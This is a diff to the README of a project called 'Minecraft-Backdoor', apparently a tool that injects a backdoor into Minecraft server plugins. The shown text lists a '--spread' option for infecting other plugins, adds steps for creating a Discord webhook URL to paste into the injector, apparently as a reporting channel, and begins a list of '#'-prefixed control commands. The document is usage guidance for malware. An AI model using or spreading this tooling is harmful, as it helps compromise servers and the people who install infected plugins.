Karis-tlg/Minecraft-Backdoor/README.md

 * --spread / -s : Spread to other plugins.
 * --debug / -b : Send debug messages in console.
 Use this before creating issue reports.

+## Discord Token Tutorial
+1) In a discord server, open Server Settings, Then "Integrations"
+2) Press 'Create Webhook'
+3) Name and profile picture can be customised, then press "Copy Webhook URL"
+4) Paste into injector / command line.

 ## Commands
 Default command prefix is ``#``,  this can be changed.
 * #help - display all command, or description of command